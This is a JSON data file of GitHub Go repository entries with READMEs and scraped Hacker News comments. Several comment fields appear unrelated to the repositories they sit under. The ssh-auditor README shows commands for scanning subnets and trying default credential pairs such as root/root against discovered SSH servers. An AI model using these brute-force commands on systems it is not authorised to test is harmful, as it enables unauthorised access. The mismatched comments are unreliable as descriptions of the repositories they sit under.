{"data": [{"name": "ncsa/ssh-auditor", "link": "https://github.com/ncsa/ssh-auditor", "tags": ["ssh", "brute-force", "auditing", "security", "discover"], "stars": 558, "description": "The best way to scan for weak ssh passwords on your network", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/ncsa/ssh-auditor.svg?branch=master)](https://travis-ci.org/ncsa/ssh-auditor)\n\n# SSH Auditor\n\n\n## Features\n\nssh-auditor will automatically:\n\n* Re-check all known hosts as new credentials are added. It will only check the new credentials.\n* Queue a full credential scan on any new host discovered.\n* Queue a full credential scan on any known host whose ssh version or key fingerprint changes.\n* Attempt command execution as well as attempt to tunnel a TCP connection.\n* Re-check each credential using a per credential `scan_interval` - default 14 days.\n\n\nIt's designed so that you can run `ssh-auditor discover` + `ssh-auditor scan`\nfrom cron every hour to to perform a constant audit.\n\n## Demos\n\n# Earlier demo showing all of the features\n[![demo](https://asciinema.org/a/5rb3wv8oyoqzd80jfl03grrcv.png)](https://asciinema.org/a/5rb3wv8oyoqzd80jfl03grrcv?autoplay=1)\n\n# Demo showing improved log output\n\n[![demo](https://asciinema.org/a/F3fQYyJcieCS9Kfna6xWferjK.png)](https://asciinema.org/a/F3fQYyJcieCS9Kfna6xWferjK?autoplay=1)\n\n\n## Usage\n\n### Install\n\n $ brew install go # or however you want to install the go compiler\n $ go get github.com/ncsa/ssh-auditor\n\n### or Build from a git clone\n\n $ go build\n\n### Build a static binary including sqlite\n\n $ make static\n\n### Ensure you can use enough file descriptors\n\n $ ulimit -n 4096\n\n### Create initial database and discover ssh servers\n\n $ ./ssh-auditor discover -p 22 -p 2222 192.168.1.0/24 10.0.0.1/24\n\n### Add credential pairs to check\n\n $ ./ssh-auditor addcredential root root\n $ ./ssh-auditor addcredential admin admin\n $ ./ssh-auditor addcredential guest guest --scan-interval 1 #check this once per day\n\n### Try credentials against discovered hosts\n\n $ ./ssh-auditor scan\n\n### Output a report on what credentials worked\n\n $ ./ssh-auditor vuln\n\n### RE-Check credentials that worked\n\n $ ./ssh-auditor rescan\n\n### Output a report on duplicate key usage\n\n $ ./ssh-auditor dupes\n\n## TODO\n\n - [x] update the 'host changes' table\n - [x] handle false positives from devices that don't use ssh password authentication but instead use the shell to do it.\n - [x] variable re-check times - each credential has a scan_interval in days\n - [x] better support non-standard ports - discover is the only thing that needs to be updated, the rest doesn't care.\n - [ ] possibly daemonize and add an api that bro could hook into to kick off a discover as soon as a new SSH server is detected.\n - [ ] make the store pluggable (mysql, postgresql).\n - [x] differentiate between a failed password attempt and a failed connection or timeout. Mostly done. Things like fail2ban complicate this.\n - [x] add go implementations for the report sqlite3 command.\n\n## Report query.\n\nThis query that `ssh-auditor vuln` runs is\n\n select\n hc.hostport, hc.user, hc.password, hc.result, hc.last_tested, h.version\n from\n host_creds hc, hosts h\n where\n h.hostport = hc.hostport\n and result!='' order by last_tested asc\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "satellity/satellity", "link": "https://github.com/satellity/satellity", "tags": ["forum", "golang", "discussion-forum", "discussion-board", "react", "postgres", "restful-api", "community"], "stars": 558, "description": "Yet another open source forum written in Golang, React and PostgreSQL.", "lang": "Go", "repo_lang": "", "readme": "## \u5173\u4e8e Satellity (Pre Alpha \u7248)\n\nSatellity \u662f\u4e00\u4e2a\u5f00\u6e90\u8bba\u575b\u3002\n\n## \u76f8\u5173\u6280\u672f\n\n1. \u524d\u540e\u7aef\u5206\u79bb\uff0c\u56e0\u4e3a Golang \u6a21\u677f\u76f8\u5f53\u4e0d\u597d\u7528\u7684\u539f\u56e0\u3002\n2. \u540e\u7aef\u4e3b\u8981\u662f Golang, \u6ca1\u6709\u7528\u6846\u67b6\uff0c\u4e3b\u8981\u662f\u5f15\u7528 package \u6765\u89e3\u51b3\u3002\n3. \u524d\u7aef React, \u53cd\u6b63\u4e5f\u6ca1\u6709\u592a\u591a\u7684\u9009\u62e9\uff0c\u5c31\u76f8\u5bf9\u968f\u610f\u4e00\u70b9\uff0c\u53e6\u5916\u4e00\u70b9\u5c31\u662f\u6709\u53ef\u80fd\u4f1a\u5199\u70b9 React Navive \u5565\u7684\u3002\n4. \u6570\u636e\u5b58\u50a8 Postgres, \u5173\u7cfb\u578b\u6570\u636e\u5e93\uff0c\u800c\u4e14\u5f00\u6e90\uff0c\u8db3\u591f\u5f3a\u5927\u4e86\u3002\n\n## \u76ee\u5f55\u7ed3\u6784\n\n1. `./web` \u4e0b\u662f\u6240\u6709\u7684\u524d\u7aef\u4ee3\u7801\uff0c\u8bf7\u53c2\u7167 `package.json` \u4e0b\u7684 scripts\u3002\n2. `./internal` \u662f Golang \u76f8\u5173\u7684\u4ee3\u7801\uff0c\u8fd0\u884c\u53c2\u7167 `Makefile`\u3002\n3. \u5176\u5b83\u90e8\u7f72\u793a\u4f8b\uff0c\u914d\u7f6e\u76f8\u5173\u3002\n\n## \u672c\u5730\u8fd0\u884c\n\n1. \u672c\u5730\u8fd0\u884c\uff0c\u9700\u8981\u51c6\u5907\u6570\u636e\u5e93 `./internal/models` \u4e0b\u3002\n2. './web' \u4e0b `.env.example` \u9700\u8981\u51c6\u5907\u4e00\u4e2a\u6d4b\u8bd5\u7528\u7684 `Github Client Id`\uff0c\u76ee\u524d\u53ea\u652f\u6301 github \u767b\u5f55\u3002\n\n## \u751f\u4ea7\u73af\u5883\u90e8\u7f72\n\n\u73b0\u5728\u529f\u80fd\u5e76\u4e0d\u5168\uff0c\u6682\u65f6\u7a7a\u7740\u5427\u3002\u3002\u3002\n", "readme_type": "markdown", "hn_comments": "https://archive.is/XxrBPNice, however\u2026 that is not how orbiting works: https://imgur.com/a/yEWadl6Nice little easter egg: If you zoom into the center of the Earth you\u2019ll find the monkey puppet meme on a cube.Does anyone know if collisions between satellites are common? Seems like a ripe \"space\" for issues lolDoes anybody know why some Starlink satellites are lined up?Very, very cool.I know little about the subject matter but expected to see higher density around the equator. Unless I'm mistaken, geo-stationary satelites need to remain there(?)Another similar website: https://stuffin.spaceHere's a side-project I have been working on - a real-time 3D satellite tracking web app! 24k+ satellites from space-track.org, max fps & optimized performance! Move, zoom & select sats for info & orbit visualization. And more to come. A must-try for space fans!That's cool, but am I the only one that doesn't believe China?They forgot a comma between Likely and Shot.Checks out. This source [0] describes the ACDL instrument as a 532 nm LIDAR, which is the correct shade of green. The NASA satellite also has a 532 nm LIDAR [1], so it also checks out that they might confuse the two.[0] https://assets.researchsquare.com/files/rs-1485263/v1_covere... (.pdf)[1] https://en.wikipedia.org/wiki/ICESat-2#Satellite_instrumentsI guess China's retaliating for shooting down their spy balloon by giving all of our cats the zoomies?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "icrowley/fake", "link": "https://github.com/icrowley/fake", "tags": [], "stars": 558, "description": "Fake data generator for Go (Golang)", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://img.shields.io/travis/icrowley/fake.svg?style=flat)](https://travis-ci.org/icrowley/fake) [![Godoc](http://img.shields.io/badge/godoc-reference-blue.svg?style=flat)](https://godoc.org/github.com/icrowley/fake) [![license](http://img.shields.io/badge/license-MIT-red.svg?style=flat)](https://raw.githubusercontent.com/icrowley/fake/master/LICENSE)\n\nFake\n====\n\nFake is a fake data generator for Go (Golang), heavily inspired by the forgery and ffaker Ruby gems.\n\n## About\n\nMost data and methods are ported from forgery/ffaker Ruby gems.\nFor the list of available methods please look at https://godoc.org/github.com/icrowley/fake.\nCurrently english and russian languages are available.\n\nFake embeds samples data files unless you call `UseExternalData(true)` in order to be able to work without external files dependencies when compiled, so, if you add new data files or make changes to existing ones don't forget to regenerate data.go file using `github.com/mjibson/esc` tool and `esc -o data.go -pkg fake data` command (or you can just use `go generate` command if you are using Go 1.4 or later).\n\n## Install\n\n```shell\ngo get github.com/icrowley/fake\n```\n\n## Import\n\n```go\nimport (\n \"github.com/icrowley/fake\"\n)\n```\n\n## Documentation\n\nDocumentation can be found at godoc:\n\nhttps://godoc.org/github.com/icrowley/fake\n\n## Test\nTo run the project tests:\n\n```shell\ncd test\ngo test\n```\n\n## Examples\n\n```go\nname := fake.FirstName()\nfullname := fake.FullName()\nproduct := fake.Product()\n```\n\nChanging language:\n\n```go\nerr := fake.SetLang(\"ru\")\nif err != nil {\n panic(err)\n}\npassword := fake.SimplePassword()\n```\n\nUsing english fallback:\n\n```go\nerr := fake.SetLang(\"ru\")\nif err != nil {\n panic(err)\n}\nfake.EnFallback(true)\npassword := fake.Paragraph()\n```\n\nUsing external data:\n\n```go\nfake.UseExternalData(true)\npassword := fake.Paragraph()\n```\n\n### Author\n\nDmitry Afanasyev,\nhttp://twitter.com/i_crowley\ndimarzio1986@gmail.com\n\n\n### Maintainers\n\nDmitry Moskowski\nhttps://github.com/corpix\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "santhosh-tekuri/jsonschema", "link": "https://github.com/santhosh-tekuri/jsonschema", "tags": ["golang", "json-schema", "jsonschema", "validator", "golang-library", "go", "draft4", "draft6", "draft7", "draft2019-09", "json", "validation", "draft2020-12"], "stars": 557, "description": "JSONSchema (draft 2020-12, draft 2019-09, draft-7, draft-6, draft-4) Validation using Go", "lang": "Go", "repo_lang": "", "readme": "# jsonschema v5.2.0\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![GoDoc](https://godoc.org/github.com/santhosh-tekuri/jsonschema?status.svg)](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5)\n[![Go Report Card](https://goreportcard.com/badge/github.com/santhosh-tekuri/jsonschema/v5)](https://goreportcard.com/report/github.com/santhosh-tekuri/jsonschema/v5)\n[![Build Status](https://github.com/santhosh-tekuri/jsonschema/actions/workflows/go.yaml/badge.svg?branch=master)](https://github.com/santhosh-tekuri/jsonschema/actions/workflows/go.yaml)\n[![codecov.io](https://codecov.io/github/santhosh-tekuri/jsonschema/coverage.svg?branch=master)](https://codecov.io/github/santhosh-tekuri/jsonschema?branch=master)\n\nPackage jsonschema provides json-schema compilation and validation.\n\n[Benchmarks](https://dev.to/vearutop/benchmarking-correctness-and-performance-of-go-json-schema-validators-3247)\n\n### Features:\n - implements\n [draft 2020-12](https://json-schema.org/specification-links.html#2020-12),\n [draft 2019-09](https://json-schema.org/specification-links.html#draft-2019-09-formerly-known-as-draft-8),\n [draft-7](https://json-schema.org/specification-links.html#draft-7),\n [draft-6](https://json-schema.org/specification-links.html#draft-6),\n [draft-4](https://json-schema.org/specification-links.html#draft-4)\n - fully compliant with [JSON-Schema-Test-Suite](https://github.com/json-schema-org/JSON-Schema-Test-Suite), (excluding some optional)\n - list of optional tests that are excluded can be found in schema_test.go(variable [skipTests](https://github.com/santhosh-tekuri/jsonschema/blob/master/schema_test.go#L24))\n - validates schemas against meta-schema\n - full support of remote references\n - support of recursive references between schemas\n - detects infinite loop in schemas\n - thread safe validation\n - rich, intuitive hierarchial error messages with json-pointers to exact location\n - supports output formats flag, basic and detailed\n - supports enabling format and content Assertions in draft2019-09 or above\n - change `Compiler.AssertFormat`, `Compiler.AssertContent` to `true`\n - compiled schema can be introspected. easier to develop tools like generating go structs given schema\n - supports user-defined keywords via [extensions](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-Extension)\n - implements following formats (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedFormat))\n - date-time, date, time, duration, period (supports leap-second)\n - uuid, hostname, email\n - ip-address, ipv4, ipv6\n - uri, uriref, uri-template(limited validation)\n - json-pointer, relative-json-pointer\n - regex, format\n - implements following contentEncoding (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedContent))\n - base64\n - implements following contentMediaType (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedContent))\n - application/json\n - can load from files/http/https/[string](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-FromString)/[]byte/io.Reader (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedLoader))\n\n\nsee examples in [godoc](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5)\n\nThe schema is compiled against the version specified in `$schema` property.\nIf \"$schema\" property is missing, it uses latest draft which currently implemented\nby this library.\n\nYou can force to use specific version, when `$schema` is missing, as follows:\n\n```go\ncompiler := jsonschema.NewCompiler()\ncompiler.Draft = jsonschema.Draft4\n```\n\nThis package supports loading json-schema from filePath and fileURL.\n\nTo load json-schema from HTTPURL, add following import:\n\n```go\nimport _ \"github.com/santhosh-tekuri/jsonschema/v5/httploader\"\n```\n\n## Rich Errors\n\nThe ValidationError returned by Validate method contains detailed context to understand why and where the error is.\n\nschema.json:\n```json\n{\n \"$ref\": \"t.json#/definitions/employee\"\n}\n```\n\nt.json:\n```json\n{\n \"definitions\": {\n \"employee\": {\n \"type\": \"string\"\n }\n }\n}\n```\n\ndoc.json:\n```json\n1\n```\n\nassuming `err` is the ValidationError returned when `doc.json` validated with `schema.json`,\n```go\nfmt.Printf(\"%#v\\n\", err) // using %#v prints errors hierarchy\n```\nPrints:\n```\n[I#] [S#] doesn't validate with file:///Users/santhosh/jsonschema/schema.json#\n [I#] [S#/$ref] doesn't validate with 'file:///Users/santhosh/jsonschema/t.json#/definitions/employee'\n [I#] [S#/definitions/employee/type] expected string, but got number\n```\n\nHere `I` stands for instance document and `S` stands for schema document. \nThe json-fragments that caused error in instance and schema documents are represented using json-pointer notation. \nNested causes are printed with indent.\n\nTo output `err` in `flag` output format:\n```go\nb, _ := json.MarshalIndent(err.FlagOutput(), \"\", \" \")\nfmt.Println(string(b))\n```\nPrints:\n```json\n{\n \"valid\": false\n}\n```\nTo output `err` in `basic` output format:\n```go\nb, _ := json.MarshalIndent(err.BasicOutput(), \"\", \" \")\nfmt.Println(string(b))\n```\nPrints:\n```json\n{\n \"valid\": false,\n \"errors\": [\n {\n \"keywordLocation\": \"\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#\",\n \"instanceLocation\": \"\",\n \"error\": \"doesn't validate with file:///Users/santhosh/jsonschema/schema.json#\"\n },\n {\n \"keywordLocation\": \"/$ref\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#/$ref\",\n \"instanceLocation\": \"\",\n \"error\": \"doesn't validate with 'file:///Users/santhosh/jsonschema/t.json#/definitions/employee'\"\n },\n {\n \"keywordLocation\": \"/$ref/type\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/t.json#/definitions/employee/type\",\n \"instanceLocation\": \"\",\n \"error\": \"expected string, but got number\"\n }\n ]\n}\n```\nTo output `err` in `detailed` output format:\n```go\nb, _ := json.MarshalIndent(err.DetailedOutput(), \"\", \" \")\nfmt.Println(string(b))\n```\nPrints:\n```json\n{\n \"valid\": false,\n \"keywordLocation\": \"\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#\",\n \"instanceLocation\": \"\",\n \"errors\": [\n {\n \"valid\": false,\n \"keywordLocation\": \"/$ref\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#/$ref\",\n \"instanceLocation\": \"\",\n \"errors\": [\n {\n \"valid\": false,\n \"keywordLocation\": \"/$ref/type\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/t.json#/definitions/employee/type\",\n \"instanceLocation\": \"\",\n \"error\": \"expected string, but got number\"\n }\n ]\n }\n ]\n}\n```\n\n## CLI\n\nto install `go install github.com/santhosh-tekuri/jsonschema/cmd/jv@latest`\n\n```bash\njv [-draft INT] [-output FORMAT] [-assertformat] [-assertcontent] []...\n -assertcontent\n \tenable content assertions with draft >= 2019\n -assertformat\n \tenable format assertions with draft >= 2019\n -draft int\n \tdraft used when '$schema' attribute is missing. valid values 4, 5, 7, 2019, 2020 (default 2020)\n -output string\n \toutput format. valid values flag, basic, detailed\n```\n\nif no `` arguments are passed, it simply validates the ``. \nif `$schema` attribute is missing in schema, it uses latest version. this can be overridden by passing `-draft` flag\n\nexit-code is 1, if there are any validation errors\n\n`jv` can also validate yaml files. It also accepts schema from yaml files.\n\n## Validating YAML Documents\n\nsince yaml supports non-string keys, such yaml documents are rendered as invalid json documents. \n\nmost yaml parser use `map[interface{}]interface{}` for object, \nwhereas json parser uses `map[string]interface{}`. \n\nso we need to manually convert them to `map[string]interface{}`. \nbelow code shows such conversion by `toStringKeys` function.\n\nhttps://play.golang.org/p/Hhax3MrtD8r\n\nNOTE: if you are using `gopkg.in/yaml.v3`, then you do not need such conversion. since this library\nreturns `map[string]interface{}` if all keys are strings.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "golang/build", "link": "https://github.com/golang/build", "tags": [], "stars": 557, "description": "[mirror] Go's continuous build and release infrastructure (no stability promises)", "lang": "Go", "repo_lang": "", "readme": "// Copyright 2017 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n//go:build ignore\n// +build ignore\n\n// The update-readmes.go tool creates or updates README.md files in\n// the golang.org/x/build tree. It only updates files if they are\n// missing or were previously generated by this tool. If the file\n// contains a \"\" comment,\n// the tool leaves content in the rest of the file unmodified.\n//\n// The auto-generated Markdown contains the package doc synopsis\n// and a link to pkg.go.dev for the API reference.\npackage main\n\nimport (\n\t\"bytes\"\n\t\"fmt\"\n\t\"go/build\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"os\"\n\t\"path/filepath\"\n\t\"strings\"\n)\n\nfunc main() {\n\troot, err := build.Import(\"golang.org/x/build\", \"\", build.FindOnly)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to find golang.org/x/build root: %v\", err)\n\t}\n\terr = filepath.Walk(root.Dir, func(path string, fi os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !fi.IsDir() {\n\t\t\treturn nil\n\t\t}\n\t\trest := strings.TrimPrefix(strings.TrimPrefix(path, root.Dir), \"/\")\n\t\tswitch rest {\n\t\tcase \"env\", \"version\", \"vendor\":\n\t\t\treturn filepath.SkipDir\n\t\t}\n\t\tpkgName := \"golang.org/x/build/\" + filepath.ToSlash(rest)\n\n\t\tbctx := build.Default\n\t\tbctx.Dir = path // Set Dir since some x/build packages are in nested modules.\n\t\tpkg, err := bctx.Import(pkgName, \"\", 0)\n\t\tif err != nil {\n\t\t\t// Skip.\n\t\t\treturn nil\n\t\t}\n\t\tif pkg.Doc == \"\" {\n\t\t\t// There's no package comment, so don't create an empty README.\n\t\t\treturn nil\n\t\t}\n\t\tif _, err := os.Stat(filepath.Join(pkg.Dir, \"README\")); err == nil {\n\t\t\t// Directory has exiting README; don't touch.\n\t\t\treturn nil\n\t\t}\n\t\treadmePath := filepath.Join(pkg.Dir, \"README.md\")\n\t\texist, err := ioutil.ReadFile(readmePath)\n\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\t// A real error.\n\t\t\treturn err\n\t\t}\n\t\tconst header = \"Auto-generated by x/build/update-readmes.go\"\n\t\tif len(exist) > 0 && !bytes.Contains(exist, []byte(header)) {\n\t\t\treturn nil\n\t\t}\n\t\tvar footer []byte\n\t\tif i := bytes.Index(exist, []byte(\"\")); i != -1 {\n\t\t\tfooter = exist[i:]\n\t\t}\n\t\tnewContents := []byte(fmt.Sprintf(`\n\n[![Go Reference](https://pkg.go.dev/badge/%s.svg)](https://pkg.go.dev/%s)\n\n# %s\n\n%s\n%s`, header, pkgName, pkgName, pkgName, pkg.Doc, footer))\n\t\tif bytes.Equal(exist, newContents) {\n\t\t\treturn nil\n\t\t}\n\t\tif err := ioutil.WriteFile(readmePath, newContents, 0644); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlog.Printf(\"Wrote %s\", readmePath)\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}\n", "readme_type": "text", "hn_comments": "How to build production grade WebServices with gRPC/OpenAPI and GolangBBC Basic and Econet.Take a look at whats up. I would use something like erlang.The front end is less of a concern.But in general the site is huge (at least 500K machines).I'd use shell scripts... Bash is the only way to ensure stability and backwards compatibly so that aliens can see the \"public (yet commercially private) town square\".Switch workflow orchestration to temporal!Just do it in with react/MERN and get it done with quickly. A twitter clone MVP can be made in a day. It\u2019s one of the most basic tutorials.It will be roughly like Mastodon, but for large files, I will use ipfs or BitTorrent.I like the idea of bluesky where user data stay in version-controlled repos and can be migrated between servers. But I guess I will use crdt for that.I will use rust for the backend, VUE for the frontend.I see (on the architecture page) Slashbase uses SQLite to store it's own app data, but it doesn't support SQLite as the target database? Is there some particular reason?Hey!Just a few weeks ago I was searching for such a solution (IDE for databases in browsers without viz) and I found a bit old but still very good and simple to use project https://github.com/sqlpad/sqlpad/\nI set it up for our company yesterday and it works greatDo you have plans for extending it to other databases in the future (eg. MySQL)?I just want to add a plug for the very awesome DBeaver, a cross platform native GUI front end which supports pretty much every major database format.I use it every day on Windows and Linux for viewing and editing SQLite and PSQL databases. I've also used it to dump and restore tables in a pinch. It supports dumping and importing tables in a multitude of formats, including JSON and plain SQL statements.Looks super useful, and brings me back to the days of installing phpMyAdmin on all my serversBrowsing through the docs, is there some kind of authentication that could be done in app? Would need to figure out how to keep things protected and only accessible by a few people.Looks promising. There are a couple of things that worries me though. (I haven't tried it yet, only skimmed the docs)1. Telemetry needs to be opt-in during install.\n2. The roles are weird, why would a developer need write access by default? That's just a recipe for disaster. Would be better to default to read-only in all roles and allow upgrading to write permission as an active choice. \n3. There needs to be a clear way to distinguish between prod/staging. I like clients where you can change the background color for different connections, eg screaming red for prod.Good luck, keep up the good workVery interesting project. Looks like you are going in the direction of an open source PopSQL instead of something like dbeaver and I really like it.very cool :) love the docsmay i ask why you started working on such a project? am interested in motivations and what gaps you see in the marketSince this is an IDE I wonder what your idea is for version control? In my opinion a database should be considered a deployment container, not a place where you\u2019d normally do live development.What got you interested in building something like this?Doing well at interviews has low correlation with being good at the job, simple as that.I was going to comment something about how with modern tooling a lot of people (including me) can write working apps without being too advanced but from your description it sounds like you know quite a lot.I don't think you have to take the label \"bad programmer\" because you don't ace job interviews. Those are contrived games anyway, if you practice you can learn to ace them but from your position it doesn't sound nessecary.I'll also throw out that it's not binary in the other direction either.There is always more to learn and as long as it's still fun I find that reading one more technical book usually does add value somewhere I wasn't expecting.> I understands the usage of Hash / Map instead of searching arrays and many other small things that actually enhance the code performanceI would consider this an assumed skill for any developer with a college degree. It\u2019s basically the point of the entire Data Structures class, which is a degree requirement.if what u say is truth then you are undoubtedly a good programmer - pragmatic people who are thoughtful of others (users and maintainers) are clearly good.this is the bizarre thing - these are qualities that actually make a good product developer, but many companies pretend that they are hiring people who will be coming up with new algorithms and not just make db records when someone clicks or submits a form.I feel the same way. I hate interviewing because I usually need to study for stuff I won't use. I also didn't do CS in college and some times I feel like this is the missing point in my career.Some companies have a more straight forward interview process. Try to stay away from big companies. There are startups paying very well.>I started as a hacker, reverse engineeringthis is the key point which makes you good. you always think as a hacker and that's why you write good code.> Still I will score quite low in job interview questions ...> I never \"studied\" computer science in a regular way,You never really mentioned algorithms, and your only mention of data structures was \"usage of [hash tables] instead of searching arrays and many other small things that actually enhance the code performance.\"While you don't need them all the time, a good understanding of common data structures and algorithms will make you a better engineer, and I suspect this is the weakness they're seeing.I wanted to give you a completely objective opinion, so I went from gematrix.org > www.c2kb.com > 9gagrss.xyz and based on that and your user name I found this: https://github.com/caviv/9gagerOne thing, I think, you should be really careful about is how you handle user inputs, e.g. this line:\nhttps://github.com/caviv/9gager/blob/20ccaaf649af525fc7a0c1d...I validated this on the live site as well, and it was really easy to insert any kind of HTML through the `channel` param. This is called XSS or Cross-Site Scripting.Also, you seem to regularly commit code that includes database connection information (I hope it is not active anymore, or at least not reachable from the outside internet), e.g.:\nhttps://github.com/caviv/9gager/commit/bcc0b91eb8638835c1557...Now, to be clear, this doesn't necessarily make you a bad programmer per se. But in my eyes, your claims of being \"actually really good\" seem to be over the top, and what I see is that you still have a lot to learn about the web and especially about security.While not as profound as you, I think I'm a decent developer. The caveat being that I don't work in software development, but in a role that's on the business side with a mix of management, software engineering, a bit of maths and data engineering and analysis.A few years ago I was applying to a well-known consulting firm, a role in data analytics. I got rejected due to \"not knowing SQL\" (which at that point I've used professionally for 8 years) and they hired someone else. A few months later, the same company made me an offer for another team in a more business driven role. I've ended up as a lead solution architect for a pretty involved WASM-based product with them and managing the guy they hired instead of me before. The guy couldn't code a for-loop in Python and I ended up doing all the engineering work for him until we could offboard him.Moral of the story: perceptions, culture, and internal team politics might play a way bigger role in seeing your value as an engineer than we might acknowledge.I guess I'm pretty bad.Lots of folks, that I know aren't especially good (because I've looked at their work), take great joy in telling me how bad I am, which they seem to know, without looking at any of my work, so I guess I'm just terrible.That's one reason I don't bother being competitive. \"Good\" is in the eye of the beholder.If someone comments their code, that can be \"good,\" for some, and \"bad,\" for others.If someone adds extensive, nested error handling, that's \"good,\" for some, and \"bad,\" for others.And so on...Usually, both sides have quite valid points.I just do things the way that I do them. Seems to work.WFM, YMMV.vague question, depends on what metrics you want to measure yourself. effective on what, generating revenue? creating impact to the world? you can answer that.A good number of people conducting interviews are never given any formal training. They may be biased against you before you even enter the room. Fortunately the demand for programmers is still good so take feedback from the interview process with a grain of salt.There are great websites where you can practice technical interview questions. Leetcode, etc. When I'm getting ready for interviews I keep a practice journal and build a deck of flashcards. I use the practice journal to categorize the problems I work on, how long it took me, how many times I've practiced that problem, notes on my solutions, etc. I try to cover the 5 most common solution types: _depth first search_, _breadth first search_, _binary search_, _two pointers_, and _dynamic programming_. Review the most common data structures and their look up times. And I use the flashcards to test my reading comprehension: I put the problem description on the card and the answer is which algorithm should be used to solve it.This gets me through 90% of interview exercises. Occasionally you get hit with a smart aleck who will try to blind-side you with an optimization problem after a hard dynamic algorithm. It's good to have some breadth in your knowledge of special data structures like heaps, k-d trees, and the like but I wouldn't waste too much time on them unless you know ahead of time that the company you really, really want to work for is likely to ask these sorts of questions. I try to book those companies for the end of a round so that I have time to warm up before I get to the ones I really want (and need to practice harder for).I don\u2019t know about your programming skills, but one of the most important and difficult things about programming is communication, and the grammar probably isn\u2019t helping.Good to know. I have pretty high opinion of myself too.lol just want to add that KISS stands for 'Keep it simple, stupid'I have done countless technical interviews and I can already tell you how your interview is going to go based on your comments here. You are confusing programmer/developer/knowing DSL and being a good candidate. You might be a good problem solver as well, but details matter. You can't simply gloss over them. A crudely solved problem might as well be not solved at all.Tech interview questions with leet code is the equivalent of standardized tests (SAT, ACT) for admissions to college/university. Neither are anything like what is required of you once you are accepted.I'd take people that have initiative, want to learn and are coach-able over someone that can excel at taking tests.You're \"expected\" to study for job interview questions. It's more a measure of willingness to jump through hoops than your competence. Developer interview questions in general has little to do with what you'll do as a developer, and what you're expected to know as a developer.Do you have to be good at everything? It is an unreasonable expectation. It is better to know a lot of stuff a little and some things very, very well.Do you have to get every job? You do not. You just need to find one that suits you and where you will be successful, and everything else is meaningless. But don't completely reject the feedback -- try to understand what is causing you to be unsuccessful in interview to get better at it and hopefully improve your chances of getting the job you want.Interview questions (and I say this being an interviewer and having interviewed thousands of candidates) do not tell if you are a good programmer though they can tell if you are a bad one. Even then, one has to recognise that selection of questions is going to shape the definition of what good and bad is.There is also no single definition of a good and bad developer is. Different types of jobs require different types of people. I have hired for positions where I needed a dull, ambitionless person that can take boring tasks day after day without complaint. If I saw a candidate with even a hint of ambition I would immediately tell them no because there was no way they would stay on the job for long.My advices:- Find your niche, find what you are good at AND gives you joy or at least satisfaction that you know you can be doing well and have others at least potentially recognise you for this.- Know your limits. Do not try to get hired over your abilities unless you do it with intention of stressing yourself to get better in the end (know why you are doing it).- Set up a periodic review of what you are doing, what is not going well and what you can do to be better at your job.I, myself, found that I am perfectionist and able to write perfect code, fast, reliable, but with the downside that it takes forever to get anything done.I decided early on that I will be working on projects that benefit from being perfectionist and that I will immediately reject any project where there just isn't any business case of polishing your code. So no websites, no UIs, no startups, etc. I am working on backends for critical corporate systems.You are better than many others.\nThe same for me, but maybe it's not enough to became rich & famous.> All of this together allowed me to build and sell already two startups. Develop and maintain easily many web sites and SaaS which creates me nice passive incomeA successful entrepreneur, perhaps, but not necessarily a good programmer.There's really nothing wrong with being dead average. The interview process is backwards in this industry anyway. No need to worry. It sounds like you're doing fine.Lots of folks are good at doing the job but bad at interviewing for jobs. Interview prep is a massive industry.Like with any skill, practice helps. It sounds like you dont really care that you dont do exceptionally well at interview. But if you wanted to improve that skill you could focus some time on it.Think of another skill you only use once every year or two. You are not going to be fantastic at it. I've played a lot of basketball in my life but only play in games ever year or two when I happen to be with folks who have a regular game. Now I'm in pretty decent shape so in general I do okay but the actual skills of playing basketball are rusty so I'm going to be a 5-7 out of 10. If I played basketball everyday I would probably be a 7-8 out of ten.The same goes for interviewing. You are coding regularly so you have some of the prerequisites for doing well in interviews but without practicing typical interview type questions you will not excel at them. If you did 100 interviews over the next year I'm sure you would start to see patterns, improve on your weaknesses, and be closer to a 10 than a 5. It's a skill you have to work on outside of just coding if you want to be a great interviewee.I went on an interview some years ago and was asked how I'd architect a certain situation with Models and Controllers. I spent some time discussing why that wasn't the right solution for what they were trying to do, and they said thanks but no thanks.Now to be fair to them, I was asked to do a certain task and I failed to do that task. It's pretty cut and dry.But I also walked away glad they turned me down, because if they're going to try and force me to do something a specific way when that way is inefficient, or troublesome or just plain not the best answer, then I 